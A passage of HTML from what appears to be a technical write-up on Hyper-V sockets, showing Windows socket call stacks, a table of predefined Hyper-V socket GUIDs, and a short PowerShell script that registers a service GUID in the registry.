</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdFastIoDeviceControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12017)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!WSPRecv</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">02 WS2_32!recv</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdFastConnectionSend</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL – 1201F)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!WSPSend</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">02 WS2_32!send</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 ClientExample!Client::Send</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 ClientExample!main</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdFastConnectionSend</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL – 1201F)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!WSPSend</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">02 WS2_32!send</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdFastIoDeviceControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12017)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!WSPRecv</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">02 WS2_32!recv</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdFastIoDeviceControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12017)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!WSPRecv</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">02 WS2_32!recv</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 ClientExample!Client::Recv</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 СlientExample!main</span></div>
</td></tr>
</tbody></table>
</div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">I will note some differences on identical calls in the text. Also, some features of a client part will be reflected further within PowerShell Direct analysis.</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In Hyper-V sockets there are no IP addresses, but there are in advance defined GUIDs:</span></div>
<div dir="ltr" style="margin-left: -5.4pt;">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="208"></col><col width="208"></col><col width="208"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: bottom;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Name</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: bottom;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">GUID</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: bottom;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Description</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_ZERO, HV_GUID_WILDCARD</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000-0000-0000-0000-000000000000</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Listeners should bind to this VmId to accept connection from all partitions.</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_BROADCAST</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_CHILDREN</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">90db8b89-0d35-4f79-8ce9-49ea0ac8b7cd</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Wildcard address for children. Listeners should bind to this VmId to accept connection from its children.</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_LOOPBACK</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">e0e16197-dd56-4a10-9195-5ee7a155a838</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Loopback address. Using this VmId connects to the same partition as the connector.</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_PARENT</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">a42e7cda-d03f-480c-9cc2-a4de20abb878</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Parent address. Using this VmId connects to the parent partition of the connector.*</span></div>
</td></tr>
</tbody></table>
</div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In our case we will take HV_GUID_PARENT. The second GUID which is required to us is specially generated for the powershell service. For this purpose we start next PowerShell-script:</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: orangered; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$friendlyName</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: darkgrey; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">=</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: darkred; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"HV Socket Application"</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="background-color: white; line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: darkgreen; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Create a new random GUID and add it to the services list then add the name as a value</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="background-color: white; line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: orangered; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$service</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: darkgrey; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">=</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">New-Item</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: navy; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-Path</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: darkred; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization\GuestCommunicationServices"</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: navy; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-Name</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ((</span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">New-Guid</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span><span style="background-color: transparent; color: darkgrey; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Guid)</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="background-color: white; line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: orangered; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$service</span><span style="background-color: transparent; color: darkgrey; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SetValue(</span><span style="background-color: transparent; color: darkred; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"ElementName"</span><span style="background-color: transparent; color: darkgrey; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: orangered; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$friendlyName</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="background-color: white; line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: darkgreen; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Copy GUID to clipboard for later use</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Write-Host</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: darkred; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Service GUID: "</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: orangered; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$service</span><span style="background-color: transparent; color: darkgrey; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PSChildName </span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">and remember the received GUID. But, in principle, it is possible to use the existing GUID which are already created during Windows installation in the same section of the register:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: darkred; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization\GuestCommunicationServices</span></div>
<br /><div dir="ltr" style="margin-left: 30.6pt;">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="288"></col><col width="287"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">GUID</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Name</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
